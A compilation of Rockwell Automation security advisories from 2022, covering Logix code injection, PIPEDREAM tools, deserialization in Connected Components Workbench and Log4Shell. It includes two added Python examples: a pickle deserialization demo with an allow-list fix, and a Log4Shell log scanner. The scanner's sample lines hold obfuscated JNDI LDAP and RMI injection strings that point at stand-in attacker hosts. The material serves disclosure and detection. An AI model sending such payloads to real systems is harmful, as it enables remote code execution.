Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the PSIRT Inbox (PSIRT@rockwellautomation.com).
Please direct all media inquiries to Marci Pelzer (MPelzer@rockwellautomation.com).

Additional Links

  • PN1354 - Industrial Security Advisory Index.
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide
  • NVD - CVE-2022-1161 (nist.gov)

High
PN1586 | PN1586 | Logix Designer Application May Allow Unauthorized Controller Code Injection
Published Date:
May 06, 2022
Last Updated:
May 06, 2022
CVE IDs:
CVE-2022-1159
Products:
RSLogix 5000 / Studio 5000 Logix Designer
CVSS Scores:
7.7
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Version 1.0 – March 31, 2022
Version 1.1 – May 06, 2022 – Updated vulnerability details and mitigations

Detailed Information

Claroty, a cybersecurity technology vendor and partner of Rockwell Automation, disclosed a vulnerability in Studio 5000 Logix Designer® software which impacts some Logix controllers. Claroty found that the Logix Designer application could allow an unauthorized third party to inject controller code using a compromised workstation where the third party has gained administrative access. This could allow a third party to download the modified program to the controller and potentially allow for arbitrary code execution on the controller in a way that would potentially be undetectable to a user. This vulnerability was found by Sharon Brizinov and Tal Keren of Claroty, and they have provided a blog post with more details located here.

Affected Products

Studio 5000 Logix Designer application v28 and later, and the following Logix controllers running these versions:
  • ControlLogix® 5580 controllers
  • GuardLogix® 5580 controllers
  • CompactLogix™ 5380 controllers
  • CompactLogix 5480 controllers
  • Compact GuardLogix 5380 controllers

Vulnerability Details

[CVE-2022-1159]: Modification of PLC Program Code
Studio 5000 Logix Designer compiles the user program on the workstation. This compilation process prepares the Logix Designer application user program for download to a Logix controller. To successfully exploit this vulnerability, an attacker must first gain administrator access to the workstation running Studio 5000 Logix Designer. The attacker can then intercept the compilation process and inject code into the user program. The user may potentially be unaware that this modification has taken place.

This exploit could also allow modification of source key protected content and license source protected content. Changes to the content may not be noticeable to the user. Additionally, exploitation could affect safety tasks if unlocked and signature unprotected at the time of the attack. A locked and signature protected safety task would not be impacted.

CVSS v3.1 Base Score: 7.7/HIGH
CVSS Vector: AV:L/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H

Risk Mitigation & User Action

There is no long-term mitigation for this vulnerability. Customers using the affected hardware and software are directed to apply compensating controls and utilize detection capabilities, which are both listed below. Additionally, we recommend implementing general security guidelines for a comprehensive defense in depth strategy.

Compensating Controls:

  • Apply the Windows Hardening Guidance found in QA63609 - Recommended guidelines for hardening software, computer, device, and network systems and infrastructure (CIS Benchmarks) to help minimize risk of the vulnerability.
  • Secure workstations by referencing the Rockwell Automation Configure System Security Features publication SECURE-UM001A. This publication also describes how to detect attempts to exploit this vulnerability on a compromised workstation using Windows® security audit features – see page 51.

Exploitation Detection Method:

The detection method can be used to determine if the user program residing in the controller is identical to what was downloaded. After upgrading to V34, this user program verification can be done via two methods:
  • On-demand using the online feature of the Logix Designer Compare Tool V9 or later. Details on how to utilize user program verification to discover if this vulnerability has been exploited can be found at Logix Designer application Compare Tool User Manual publication LDCT-UM001C, pages 19-20.
  • Schedule user program verification on FactoryTalk® AssetCentre V12 or later (Available Fall 2022).
Notes:
  • The user program comparison must be performed using the online compare tool feature from an uncompromised workstation.
  • Customers are directed to upgrade to Studio 5000® V34 software, or later, and the corresponding firmware versions for the Logix 5580, 5380, 5480, GuardLogix 5580 and Compact GuardLogix 5380. Review your controllers’ user manual to determine the required controller firmware version.

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products
  • Consult the product documentation for specific features, such as a hardware keyswitch setting, which may be used to block unauthorized changes.
  • Block all traffic to EtherNet/IP™ or other CIP™ protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to TCP and UDP Port# 2222 and Port# 44818 using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation Products, see BF7490 - TCP/UDP Ports Used by Rockwell Automation Products.
Software/PC-based Mitigation Strategies
  • Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Use of Microsoft AppLocker or other similar allow list application can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at QA17329 - Using Rockwell Automation Software Products with AppLocker.
  • Confirm that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum number of rights as needed.
Social Engineering Mitigation Strategies
  • Do not click on or open URL links from untrusted sources.
  • Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.

General Mitigations
  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted websites and attachments.
  • Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please see the Rockwell Automation publication number SECURE-RM001 “System Security Design Guidelines Reference Manual”.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on PN1354 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the PSIRT Inbox (PSIRT@rockwellautomation.com).
Please direct all media inquiries to Marci Pelzer (MPelzer@rockwellautomation.com).

Additional Links

  • PN1354 - Industrial Security Advisory Index.
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide
  • CVE-2022-1159

PN1594 | PN1594 | APT Cyber Tools Targeting ICS/SCADA Devices (PIPEDREAM/INCONTROLLER)
Published Date:
May 06, 2022
Last Updated:
May 06, 2022
Products:
FactoryTalk Linx Gateway
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Version 1.0 – May 6, 2022

Executive Summary

On April 13, 2022, researchers announced a new set of tools that was developed by an Advanced Persistent Threat (APT). This set of tools allows threat actors to attack specific ICS and OT hardware and software. Rockwell Automation is providing this advisory to notify customers of our response to this threat.

We are diligently working through our process to evaluate the threat and provide security mitigations as needed. Rockwell Automation recommends that customers apply hardening techniques, in addition to security best practices for a comprehensive defense in depth approach.

Affected Products

We are aware that the tool set contains modules that target OPC UA servers, CODESYS runtimes, and ASRock drivers. After evaluation, Rockwell Automation is aware that the products, listed below, use one of the targeted components. This list may be updated if more products are identified.

Products that use OPC UA servers:
  • FactoryTalk® Linx Gateway
    • Editions include embedded, basic, standard, extended distributed, professional
    • Versions include 6.10, 6.11, 6.20, 6.21 and 6.30

Risk Mitigation & User Action

We recommend the following compensating controls for customers using Rockwell Automation products that use the targeted hardware and software:
  • Disable anonymous authentication and configure the use of FactoryTalk Security using the following guidance from the FactoryTalk Linx Gateway Getting Results Guide, publication FTLG-GR001E:
    • Chapter 4 - UA Server Endpoints - Endpoint Properties
    • Appendix D - Secure FactoryTalk Linx Gateway using FactoryTalk Security
  • Enforce a lockout threshold for failed authentication attempts and configure audit logs, using the following guidance from the FactoryTalk Security System Configuration Guide, publication FTSEC-QS001R, Chapter 9, to detect signs of an attack:
    • Set system policies - Account Policy Settings
    • Set audit policies - Monitor security-related events

General Security Guidelines

Refer to the Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Industrial Security Services website for information on security services from Rockwell Automation to assess, help protect, detect, respond, and recover from incidents. These services include assessments, designs, implementations, industrial anomaly detection, patch management, and remote infrastructure monitoring and administration.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation in PN1354 – Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

If you have questions regarding this notice, please send an email to our product security inbox at: PSIRT@rockwellautomation.com

Additional Links

  • PN1354 – Industrial Security Advisory Index
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide
  • https://www.cisa.gov/uscert/ncas/alerts/aa22-103a

PN1592 | PN1592 | Vulnerable Third-Party Components in FactoryTalk® ProductionCentre
Published Date:
May 04, 2022
Last Updated:
May 04, 2022
Products:
FactoryTalk ProductionCentre
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Version 1.0 – May 4, 2022

Executive Summary

Rockwell Automation discovered multiple vulnerabilities affecting third-party software utilized by our FactoryTalk® ProductionCentre (FTPC) products. If exploited, these vulnerabilities could have various effects, including but not limited to, remote code execution, information disclosure, and denial of service on FTPC products.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerabilities, including products in scope and recommended countermeasures, are provided herein.

Affected Products

FactoryTalk® ProductionCentre v10.04 and earlier

Vulnerability Details

As part of our commitment to security, Rockwell Automation performs routine testing and vulnerability scanning to maintain the security posture of its products. Through scanning of open-source components, we became aware that third-party components used within our FTPC products contain publicly known vulnerabilities with severities ranging from low to high. The third-party components and versions in scope are listed below:
  • Apache ActiveMQ 5.15.0
  • Apache Commons BeanUtils 1.9.0
  • Apache CXF 3.1.10
  • Apache HttpClient 4.5.2
  • Apache Santuario (Java) 2.0.8
  • Apache Xalan (Java) 2.7.1
  • Apache Xerces2J 2.11.0.SP5
  • Bouncy Castle 1.36, 1.44, 1.55
  • Cryptacular 1.51
  • Codehaus XFire 0.9.5.2
  • Dom4J 1.61
  • Hibernate ORM 3.3.2
  • Jackson Databind 2.1.4
  • JasperReports Library 6.2.0
  • Java Platform Standard Edition 8u181
  • JBoss Remoting 4.0.22.Final
  • JGroups 2.12.2.Final
  • Spring Framework 2.5.5, 4.3.8-4.3.9
  • Undertow Core 1.0.10.Final
  • Apache Velocity 1.7

Risk Mitigation & User Action

Customers using the affected software are encouraged to implement the risk mitigations below to minimize the risk of vulnerabilities. We encourage customers to combine the risk mitigations with security best practices to deploy a defense-in-depth strategy.
  • Apply security recommendations found in the FactoryTalk® ProductionCentre Knowledgebase Article IN39626 - Security Recommendations for FactoryTalk ProductionCentre to help minimize the risk of these third-party vulnerabilities.
  • Deploy network segmentation, when possible, per our standard deployment recommendations.

General Security Guidelines

  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted websites and attachments.
  • Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, see Knowledgebase Article PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also, recognize that a VPN is only as secure as the connected devices.
Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable the assessment, design, implementation, and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Additional Links

  • PN1354 - Industrial Security Advisory Index
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide
  • Hardening Guidance (CIS Benchmarks)
If you have questions regarding this notice, please send an email to our product security inbox at: PSIRT@rockwellautomation.com

High
PN1589 | Multiple Products Vulnerable to Deserialization of Data
Published Date:
April 04, 2022
Last Updated:
April 04, 2022
CVE IDs:
CVE-2022-1118
Products:
Using CCW with Micro800 Controllers, ISaGRAF, Using CCW with Component Class Drives, Using CCW with PanelView Component Terminals
CVSS Scores:
8.6
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Version 1.0 – April 4, 2022

Executive Summary

Rockwell Automation received a report from the researcher Kimiya, through Trend Micro’s Zero Day Initiative, about vulnerabilities in Connected Components Workbench™, ISaGRAF® Workbench and Safety Instrumented Systems Workbench for Trusted® controllers. If successfully exploited, these vulnerabilities may result in remote code execution. All of them require user interaction to be exploited, for example opening a malicious file delivered through a phishing attack.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

  • Connected Components Workbench v13.00.00 and below.
  • ISaGRAF Workbench v6.0-v6.6.9
  • Safety Instrumented System Workstation v1.2 and below (for Trusted Controllers)

Vulnerability Details

CVE-2022-1118: Deserialization of untrusted data may result in arbitrary code execution
Connected Components Workbench does not limit the objects that can be deserialized. An attacker can craft a malicious serialized object that, if opened by a local user in Connected Components Workbench, may result in arbitrary code execution. This vulnerability requires user interaction to be successfully exploited.

CVSS v3.1 Base Score: 8.6/10[HIGH]
CVSS v3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
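The root cause named above, a loader that "does not limit the objects that can be deserialized", is a general pattern rather than anything specific to the Workbench file format. The following Python script is an added example (editor's illustration, not Rockwell code and not the .ccwsln format): it uses Python's own pickle as the stand-in serialization format, shows a file that makes the loader call an attacker-chosen function (here the harmless builtins.pow, where a real payload would name os.system), and the fix, an Unpickler whose find_class only resolves an explicit allow-list of types. The project file contents are constructed.

```python
"""Unrestricted vs. allow-listed deserialization, with pickle standing in for a project file format (added example)."""
import io
import pickle
from collections import OrderedDict

# The only (module, class) pairs a project file is permitted to instantiate while loading.
ALLOWED_GLOBALS = {("collections", "OrderedDict")}


class RestrictedUnpickler(pickle.Unpickler):
    """Refuse every global lookup outside the allow-list: this is what 'limiting the objects' means in practice."""

    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refusing to resolve {module}.{name} while loading untrusted data")


class AttackerObject:
    """Serializes to 'call builtins.pow(2, 10) on load'. A real payload would name os.system or similar."""

    def __reduce__(self):
        return (pow, (2, 10))


def malicious_project_file():
    """Constructed: what a phished user would be sent."""
    return pickle.dumps(AttackerObject())


def legitimate_project_file():
    """Constructed: a benign file that only contains allow-listed types."""
    return pickle.dumps(OrderedDict(device="Micro850", revision=3))


def load_unrestricted(blob):
    """Vulnerable loader: whatever callable the file names is invoked with the file's arguments."""
    return pickle.loads(blob)


def load_restricted(blob):
    """Hardened loader: returns ('ok', value) or ('blocked', reason) and never runs unlisted code."""
    try:
        return "ok", RestrictedUnpickler(io.BytesIO(blob)).load()
    except pickle.UnpicklingError as exc:
        return "blocked", str(exc)


if __name__ == "__main__":
    print("unrestricted load ran attacker's callable, result:", load_unrestricted(malicious_project_file()))
    print("restricted load of the same file:", load_restricted(malicious_project_file()))
    print("restricted load of a legitimate file:", load_restricted(legitimate_project_file()))
```

The allow-list is deliberately a set of exact (module, name) pairs rather than a module prefix: gadget chains are built from classes that live in trusted modules, so "anything under collections" would not be a meaningful restriction.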

Risk Mitigation & User Action

Customers using the affected software are encouraged to update to an available software revision that addresses the associated risk. Customers who are unable to update are directed towards risk mitigation strategies provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.
Products Affected | Suggested Actions
  • Connected Components Workbench versions 13.00 and below: update to version 20.00, which mitigates this vulnerability.
  • ISaGRAF Workbench versions 6.0-6.6.9: follow the security guidelines below until an updated release is available to mitigate this issue.
  • SIS Workstation versions 1.2 and below (for Trusted Controllers): follow the security guidelines below until an updated release is available to mitigate this issue.

If an upgrade is not possible or available, customers should consider deploying the following mitigations:
  • Run Connected Components Workbench as a User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Do not open untrusted .ccwsln files with Connected Components Workbench, ISaGRAF, or SISW. Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.
  • Use of Microsoft® AppLocker or other similar allow list applications can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at QA17329 - Using Rockwell Automation Software Products with AppLocker
  • Confirm that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum number of rights as needed.

General Security Guidelines

  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted websites and attachments.
  • Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, see PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that a VPN is only as secure as the connected devices.
Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the PSIRT Inbox (PSIRT@rockwellautomation.com)

Additional Links

  • PN1354 - Industrial Security Advisory Index
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide (Pub. enet-td002)
  • http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-1118

Critical
PN1579 | Log4Shell Vulnerability Notice
Published Date:
January 21, 2022
Last Updated:
December 01, 2024
CVE IDs:
CVE-2021-4104, CVE-2021-45046, CVE-2019-17571, CVE-2021-44228
Products:
Production Management
CVSS Scores (v3.1):
10, 3.7, 8.1, 9.8
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
Yes

Revision Number: 2.2
Revision History
Version 1.0 – 12-Dec-2021. Initial Version
Version 1.1 – 15-Dec-2021. Updated Affected Products and Risk Mitigation & User Actions
Version 1.2 – 17-Dec-2021. Updated FTA DataView Versions affected
Version 2.0 – 19-Dec-2021. Updated Affected Products and Risk Mitigation & User Actions, etc.
Version 2.1 – January 7, 2022. Updated FactoryTalk® Analytics™ DataView, Data Flow ML, Warehouse Management Patch Guidance and User Actions, etc.
Version 2.2 – January 21, 2022. Updated DataView Mitigation Actions, etc.

Executive Summary

On December 9, 2021, researchers publicly disclosed a vulnerability, named “Log4Shell”, in the Apache Log4j 2 Java logging library. It allows remote code execution in applications that log attacker-controlled input.

Rockwell Automation is aware of this vulnerability and of how it could, if exploited, affect our customers’ environments. Rockwell Automation has completed its evaluation of how the mitigation techniques affect the functionality and performance of the Rockwell Automation hardware, software, and pre-engineered products and solutions that incorporate this software.

Affected Products

Rockwell Automation has investigated its product portfolio to identify which of its products may be directly affected by the "Log4Shell" vulnerability. Rockwell Automation will continue to monitor this situation and will update this advisory if necessary. Our investigation has indicated that the following Rockwell Automation products are affected.
Product Affected | Versions Affected
  • Plex (A Rockwell Automation Company) Industrial Internet of Things: all versions < 2.17
  • Fiix (A Rockwell Automation Company) CMMS™ core V5: this product is cloud-based and has been updated for all customers
  • Warehouse Management: 4.01.00, 4.02.00, 4.02.01, 4.02.02
  • EIG (Discontinued): 3.03.00
  • Industrial Data Center (9300-NS-ESSENTIAL, 9300-NS-ESSENTIALPLUS): Gen 1, Gen 2, Gen 3, Gen 3.5
  • VersaVirtual™ Application (9300-VV2000RN, 9300-VV2000EN, 9300-VV1000RN, 9300-VV1000EN): Series A
  • FactoryTalk® Analytics™ DataFlowML: all versions up to and including 4.00.00
  • FactoryTalk Analytics DataView: all versions
  • Firewall Managed Support – Cisco Firepower® Threat Defense (9300-FMAN, 9300-FSYS): versions 6.2.3 – 7.1.0

Vulnerability Details

CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker-controlled LDAP and other JNDI related endpoints

Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0, this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.

CVSS v3.1 Base Score: 10.0/10 [Critical]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVE-2021-45046: Apache Log4j2 Thread Context Message Pattern and Context Lookup Pattern vulnerable to a denial of service attack

It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allow attackers with control over Thread Context Map (MDC) input data, when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC), to craft malicious input data using a JNDI Lookup pattern, resulting in a denial of service (DoS) attack. Log4j 2.15.0 restricts JNDI LDAP lookups to localhost by default. Note that previous mitigations involving configuration, such as setting the system property log4j2.formatMsgNoLookups to true, do NOT mitigate this specific vulnerability.

CVSS v3.1 Base Score: 3.7/10 [Low]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L
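Both CVEs above turn on the same mechanism: a ${jndi:...} lookup string reaching Log4j, either through a logged message (CVE-2021-44228) or through MDC data rendered by a context lookup pattern (CVE-2021-45046). Attackers wrap the string in other lookups (${lower:j}, ${::-j}, ${env:X:-j}) so that a naive grep for "jndi" misses it. The following Python script is an added example (editor's detection logic, not Rockwell tooling or an official signature): it folds those nesting tricks the way Log4j's own lookup evaluation would, then flags any line that still contains a JNDI lookup. The log lines are constructed and the IP addresses are documentation ranges.

```python
"""Fold Log4j lookup obfuscation and flag JNDI lookup strings in log lines (added example)."""
import re

INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")                 # a ${...} with no nested lookup inside it
JNDI = re.compile(r"\$\{\s*jndi\s*:[^}]*\}?", re.IGNORECASE)   # what is left once nesting is folded

# Constructed access-log lines: one benign, three attack attempts, one benign line that uses a lookup-like string.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:03:12:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Dec/2021:03:12:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '198.51.100.7 - - [10/Dec/2021:03:12:11 +0000] "GET /?x=${${lower:j}ndi:${lower:l}dap://198.51.100.7/b} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '203.0.113.9 - - [10/Dec/2021:03:13:40 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://203.0.113.9/c}"',
    '10.0.0.6 - - [10/Dec/2021:03:14:02 +0000] "GET /report?name=${date:yyyy} HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
]


def _resolve(body):
    """Evaluate the lookups attackers use to hide the word 'jndi'. Return None for lookups we do not fold."""
    prefix, _, rest = body.partition(":")
    if prefix.lower() == "lower":
        return rest.lower()
    if prefix.lower() == "upper":
        return rest.upper()
    if ":-" in body:                          # ${name:-default}: an unresolvable name yields its default, so ${::-j} -> j
        return body.split(":-", 1)[1]
    return None


def normalize(text, max_rounds=32):
    """Repeatedly fold innermost lookups until nothing changes; bounded so pathological input cannot spin."""
    for _ in range(max_rounds):
        changed = False

        def fold(match):
            nonlocal changed
            folded = _resolve(match.group(1))
            if folded is None:
                return match.group(0)
            changed = True
            return folded

        text = INNER_LOOKUP.sub(fold, text)
        if not changed:
            break
    return text


def scan(lines):
    """Return (line_index, normalized_lookup) for every line that contains a JNDI lookup after folding."""
    hits = []
    for index, line in enumerate(lines):
        match = JNDI.search(normalize(line))
        if match:
            hits.append((index, match.group(0)))
    return hits


if __name__ == "__main__":
    for index, lookup in scan(SAMPLE_LOG):
        print(f"line {index}: {lookup}")
```

This flags attempts, not successful exploitation: pair it with egress monitoring for the LDAP/RMI callback the payload names. It also does not undo encodings the web server applies before logging (URL encoding, base64 in headers), so decode those fields first when scanning raw request logs.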

CVE-2021-4104: JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data

JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.

CVSS v3.1 Base Score: 8.1/10 [High]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2019-17571: Log4j 1.2 includes a SocketServer class that is vulnerable to deserialization of untrusted data

Included in Log4j 1.2 is a SocketServer class that is vulnerable to deserialization of untrusted data, which can be exploited to remotely execute arbitrary code when combined with a deserialization gadget while listening to untrusted network traffic for log data. This affects Log4j 1.2 versions up to and including 1.2.17.

CVSS v3.1 Base Score: 9.8/10 [Critical]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Risk Mitigation & User Action

Vulnerability | Products Affected | Suggested Actions

CVE-2021-44228
  • Plex Industrial IoT: this product has been updated to version 2.17.1 and all vulnerabilities are mitigated at this time. No user action is required.
  • Fiix CMMS core V5: the product has been updated to remove Log4j completely and is no longer vulnerable. No user action is required.
  • Warehouse Management versions 4.01.00, 4.02.00, 4.02.01, 4.02.02: customers should upgrade to version 4.02.03, which has been released to mitigate this vulnerability.
  • MES EIG 3.03.00: this product is discontinued and no patch will be provided. Customers should upgrade to EIG Hub if possible or work with their local representatives on alternative solutions.
  • Industrial Data Center (9300-NS-ESSENTIAL, 9300-NS-ESSENTIALPLUS) – Gen 1, Gen 2, Gen 3, Gen 3.5:
    - For non-managed support customers, follow the mitigation instructions outlined by VMware in VMSA-2021-0028.
    - For managed support customers, the Rockwell Automation support team will contact affected customers to implement mitigation steps. For specific site details, contact the support team or your Customer Success Manager.
    - For non-managed support customers with a VNXe, follow the mitigation outlined by Dell in DSA-2021-298.
    - For non-managed support customers with a Data Domain, follow the mitigation outlined by Dell in DSA-2021-274.
  • VersaVirtual (9300-VV2000RN, 9300-VV2000EN, 9300-VV1000RN, 9300-VV1000EN) – Series A:
    - For non-managed support customers, follow the mitigation instructions outlined by VMware in VMSA-2021-0028.2.
    - For managed support customers, the Rockwell Automation support team will contact affected customers to implement mitigation steps. For specific site details, contact the support team or your Customer Success Manager.
  • FactoryTalk Analytics DataFlowML: customers should upgrade to version 4.00.01, which has been released to mitigate this vulnerability. It is recommended that customers not use DataFlowML prior to version 4.00.01.
  • FactoryTalk Analytics DataView 3.02: customers are required to upgrade from 3.02 to 3.03.01. Customers who have prior versions are required to upgrade to 3.02 first. It is recommended that customers not use DataFlow ML prior to version 4.00.00.
  • Firewall Managed Support – Cisco Firepower Threat Defense (9300-FMAN, 9300-FSYS) versions 6.2.3 – 7.1.0:
    - For managed support customers, the Rockwell Automation support team will contact affected customers to implement mitigation steps. For specific site details, contact the support team or your Customer Success Manager.
    - For non-managed support customers, follow the mitigation instructions outlined by Cisco in CSCwa46963.

CVE-2021-45046, CVE-2021-4104, CVE-2019-17571
  • No products affected at this time.

Products Using Log4j 1.2
A number of Rockwell Automation products contain log4j 1.2 libraries that may be detected by various scanning tools. These products do not use the JMSAppender or the SocketServer and are therefore not vulnerable to CVE-2021-4104 and CVE-2019-17571:

Products Evaluated and Not Affected | Suggested Actions
  • FactoryTalk Analytics DataView 3.02.00, 3.03.00, 4.00.00, 4.01.00
  • Data Scheduler
  • FactoryTalk Augmented Modeler
  • FactoryTalk Analytics DataFlowML 2.01
  • FactoryTalk Analytics Information Platform
  • Live Transfer 10.4, 11.0
  • Pavilion8
  • FactoryTalk Analytics Security Provider 3.02.00, 3.03.00
  • PanelView 5000
  • FactoryTalk ProductionCentre (All Versions)
  • FactoryTalk PharmaSuite (All Versions)
  No actions are needed for the products above, as they do not use the JMSAppender or the SocketServer and are therefore not vulnerable.
  • Studio 5000 View Designer: Studio 5000 does not use the JMSAppender or the SocketServer and is not vulnerable.
  Note: Studio 5000 consists of Studio 5000 Logix Designer and Studio 5000 View Designer. If Logix Designer is the only component required, View Designer version 8 or older may be removed by uninstalling “Studio 5000 View Designer” using the Windows Add/Remove Programs feature. This removes the log4j 1.2.x library completely. Alternatively, update Studio 5000 View Designer to version 9 or later, which ships updated log4j libraries that are not vulnerable.
